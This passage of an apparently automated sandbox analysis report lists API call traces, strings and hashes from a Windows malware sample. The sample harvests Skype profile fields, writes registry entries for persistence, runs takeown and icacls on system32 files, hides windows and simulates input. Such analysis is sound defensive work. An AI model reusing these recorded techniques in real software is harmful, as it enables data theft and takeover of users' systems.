                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000190,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00415A95
                                                                                                                                                                                                                                                        • Part of subcall function 004154D8: SetFocus.USER32(?), ref: 00415516
                                                                                                                                                                                                                                                        • Part of subcall function 004154D8: Sleep.KERNEL32(00000064), ref: 00415539
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00415AB1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000190,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00415AB8
                                                                                                                                                                                                                                                        • Part of subcall function 00415547: Sleep.KERNEL32(000001F4), ref: 0041556E
                                                                                                                                                                                                                                                        • Part of subcall function 00415547: lstrcmpA.KERNEL32(00000000,?), ref: 0041559A
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00415AD5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000190), ref: 00415ADC
                                                                                                                                                                                                                                                        • Part of subcall function 004155B7: SetFocus.USER32(?), ref: 004155FA
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00415AF8
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00415B08
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,0045985C), ref: 00415B14
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020), ref: 00415B23
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 00415B2A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00004E20), ref: 00415B35
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Sleep$Show$lstrlen$Focus$lstrcpyn$ForegroundProcessRectlstrcat$ClassCurrentPriority$CountDesktopThreadTicklstrcmplstrcpywsprintf
                                                                                                                                                                                                                                                      • String ID: :%d$http://
                                                                                                                                                                                                                                                      • API String ID: 1001066556-2872252496
                                                                                                                                                                                                                                                      • Opcode ID: ba28c1880504dae10be224ee53f31106fed06acb865c1f68055e3351f5758be1
                                                                                                                                                                                                                                                      • Instruction ID: 1a0f13dbbb03e331f307676340b79c983e3ef856dc49174a57c53eedfa74bf4b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba28c1880504dae10be224ee53f31106fed06acb865c1f68055e3351f5758be1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEA1F972901704FBEB11BB60DD4AFEE376CAF55305F10006AFA04A1192DB7C9A86876E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D849
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00415D7A,00000000,00000000,00000000), ref: 0040D871
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0001D4C0), ref: 0040D878
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005F6F,00000000,00000000,00000000), ref: 0040D888
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000604A,00000000,00000000,00000000), ref: 0040D8AE
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D8B0
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D8BD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040D8CC
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000D016,00000000,00000000,00000000), ref: 0040D8E9
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 0040D8F7
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00459550,\WinRAR\rar.exe), ref: 0040D957
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001F9D,00000000,00000000,00000000), ref: 0040D978
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0041272F,00000000,00000000,00000000), ref: 0040D98C
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00012FDD,00000000,00000000,00000000), ref: 0040D998
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000095B5,00000000,00000000,00000000), ref: 0040D9A4
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004116A8,00000000,00000000,00000000), ref: 0040D9B0
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00006B75,00000000,00000000,00000000), ref: 0040D9BC
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000056A7,00000000,00000000,00000000), ref: 0040D9C8
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00008CB0,00000000,00000000,00000000), ref: 0040D9E4
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000076C6,00000000,00000000,00000000), ref: 0040D9F0
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000073CE,00000000,00000000,00000000), ref: 0040D9FC
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000085CA,00000000,00000000,00000000), ref: 0040DA08
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00007DF4,00000000,00000000,00000000), ref: 0040DA14
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00411206,00000000,00000000,00000000), ref: 0040DA20
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004157A7,00000000,00000000,00000000), ref: 0040DA2C
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0041C19E,00000000,00000000,00000000), ref: 0040DA38
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00A4CB80), ref: 0040DA49
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateThread$Sleep$CountTick$lstrcat
                                                                                                                                                                                                                                                      • String ID: \WinRAR\rar.exe
                                                                                                                                                                                                                                                      • API String ID: 4190259895-4135181939
                                                                                                                                                                                                                                                      • Opcode ID: 277c804197aa7d90b52c5cbebdc41bdb7614632443af62fe0fe6e982fd7aa106
                                                                                                                                                                                                                                                      • Instruction ID: b5e03ec3d1ab7aa72586ffd96dea160173fde5e76d96af4e3afdbc534cda32d7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 277c804197aa7d90b52c5cbebdc41bdb7614632443af62fe0fe6e982fd7aa106
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6519DE0A4535CBEF22037B26CC6E3B2E0CDA517DD714043BB406710D289BC8C998A7E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(0041EF88,PSTN_BALANCE,0045B918,00000000,?,0041EF88,0045B920), ref: 0041E7C8
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(0041EF88,FULLNAME), ref: 0041E7D8
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(0045B204,00000001), ref: 0041E7E4
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(0041EF88,BIRTHDAY), ref: 0041E7F5
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(0041EF88,SEX), ref: 0041E805
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmp$lstrcpy
                                                                                                                                                                                                                                                      • String ID: ABOUT$BIRTHDAY$CITY$COUNTRY$FULLNAME$HOMEPAGE$IPCOUNTRY$MOOD_TEXT$PHONE_HOME$PHONE_MOBILE$PHONE_OFFICE$PSTN_BALANCE$SEX$TIMEZONE
                                                                                                                                                                                                                                                      • API String ID: 3559461494-3954122781
                                                                                                                                                                                                                                                      • Opcode ID: e8d82be9b08dcb3db5147793183b6bf9498cbd386925007721376df96291441b
                                                                                                                                                                                                                                                      • Instruction ID: f9edd0e32f96142c206465e46909afe53b361a09739fb7dad9030ebacacff462
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8d82be9b08dcb3db5147793183b6bf9498cbd386925007721376df96291441b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0417BB479532AB4E6116222AD82FBF1A5CCB55F99F640027BC00B11C3E78CA98255FF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E95A
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: EnterCriticalSection.KERNEL32(0045B020), ref: 0041D055
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: lstrlenA.KERNEL32(?), ref: 0041D066
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: SendMessageA.USER32(0000004A,00000000), ref: 0041D082
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: LeaveCriticalSection.KERNEL32(0045B020), ref: 0041D092
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E969
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E977
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E985
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E993
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9A1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9AF
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9BD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9CB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9D9
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9E7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041E9F5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA03
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA11
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA1F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA29
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041EA37
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CriticalSection$EnterLeaveMessageSendlstrlen
                                                                                                                                                                                                                                                      • String ID: GET CURRENTUSERHANDLE$GET PROFILE ABOUT$GET PROFILE BIRTHDAY$GET PROFILE CITY$GET PROFILE COUNTRY$GET PROFILE FULLNAME$GET PROFILE HOMEPAGE$GET PROFILE IPCOUNTRY$GET PROFILE MOOD_TEXT$GET PROFILE PHONE_HOME$GET PROFILE PHONE_MOBILE$GET PROFILE PHONE_OFFICE$GET PROFILE PSTN_BALANCE$GET PROFILE SEX$GET PROFILE TIMEZONE
                                                                                                                                                                                                                                                      • API String ID: 2946355272-1195147660
                                                                                                                                                                                                                                                      • Opcode ID: 0e05c6c380154905a828118fb1f3ec784fd830000eda53cf48dd39c78da103a4
                                                                                                                                                                                                                                                      • Instruction ID: 0586fa8bb1ab81b82726b65ea7d9d3e3f81e2f51b5616a92291bba97b2517846
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e05c6c380154905a828118fb1f3ec784fd830000eda53cf48dd39c78da103a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE11B792F9152C3950253276BC8BD7F4F2CC9C9B7DBA4041FF504491831F8C29C6A9BA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 004085DA
                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(00000000,000000E6), ref: 00408634
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000000), ref: 00408661
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00408676
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00408683
                                                                                                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,?,00000000), ref: 004086C9
                                                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,?,?,00000000,00000004,?,00000004), ref: 004086F3
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,?,00000004), ref: 004086FC
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,00000000,00000004,?,00000004), ref: 00408707
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0040872A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,00000000,00000004,?,00000004), ref: 00408735
                                                                                                                                                                                                                                                        • Part of subcall function 004142EE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,76AE83C0,76AE8A60), ref: 004142FE
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000000), ref: 00408778
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00408782
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040878F
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000000), ref: 004087D0
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 004087DA
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 004087E7
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Windows\system32\), ref: 00408826
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00408830
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040883D
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00408886
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00408893
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Windows\system32\), ref: 004088D2
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 004088DC
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 004088E9
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: GetComputerNameA.KERNEL32(?,?), ref: 00408492
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrcatA.KERNEL32(?,00000001), ref: 004084A6
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrcatA.KERNEL32(?,?), ref: 004084FE
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrcatA.KERNEL32(?,0042A3B0), ref: 00408530
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrcatA.KERNEL32(?,00000001), ref: 0040853A
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: CopyFileA.KERNEL32(0000007F,?,00000001), ref: 00408553
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: SetFileAttributesA.KERNEL32(?,00000080), ref: 00408565
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: Sleep.KERNEL32(00000001), ref: 00408583
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: SetFileAttributesA.KERNEL32(0000007F,00000080), ref: 00408592
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: DeleteFileA.KERNEL32(0000007F), ref: 00408595
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Windows\system32\), ref: 0040887C
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: GetUserNameA.ADVAPI32(?,?), ref: 0040838E
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: wsprintfA.USER32 ref: 004083B8
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: ShellExecuteA.SHELL32(00000000,00000000,takeown,?,00000000,00000000), ref: 004083CD
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: Sleep.KERNEL32(000007D0), ref: 004083D8
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: wsprintfA.USER32 ref: 004083F2
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: ShellExecuteA.SHELL32(00000000,00000000,icacls,?,00000000,00000000), ref: 00408407
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: Sleep.KERNEL32(00000BB8), ref: 00408412
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrlenA.KERNEL32(?), ref: 00408425
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$Sleeplstrcpy$File$AttributesExecuteShell$CreateNamewsprintf$CloseComputerCopyDeleteDirectorySnapshotToolhelp32UserValueWindowslstrlen
                                                                                                                                                                                                                                                      • String ID: C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 3762291812-1520839452
                                                                                                                                                                                                                                                      • Opcode ID: 4225e2a9f6c30a0eb4da557927706b4a7f56f109547df7c5c5968730367a42af
                                                                                                                                                                                                                                                      • Instruction ID: c2cce530174d335f4e65662834358c013a2ccb5602420c717432df29190648c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4225e2a9f6c30a0eb4da557927706b4a7f56f109547df7c5c5968730367a42af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D891F1B291021C6ADB11E7E0DD45FEA77BCEB48714F5404BBF605F2081EA78AB84CB65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0041CCED
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000032), ref: 0041CD09
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041CD13
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(00000000,00000000), ref: 0041CD29
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0041CD4D
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0041CD91
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0041CD9A
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041CDD8
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041CDFA
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041CE21
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041CE2A
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000002), ref: 0041CE2F
                                                                                                                                                                                                                                                      • SetFocus.USER32(00000002), ref: 0041CE34
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000002), ref: 0041CE39
                                                                                                                                                                                                                                                      • SetFocus.USER32(00000002), ref: 0041CE3E
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(00000000,00000000), ref: 0041CE44
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(00000000,00000000,00000000), ref: 0041CE70
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(00000000,00000000), ref: 0041CE9C
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000002,?), ref: 0041CEAF
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041CF35
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0041CF5A
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(00000002,?), ref: 0041CF66
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 0041CF70
                                                                                                                                                                                                                                                        • Part of subcall function 004141AC: SendInput.USER32(00000002,00000000,0000001C), ref: 004141DE
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 0041CF79
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(?,?), ref: 0041CF81
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
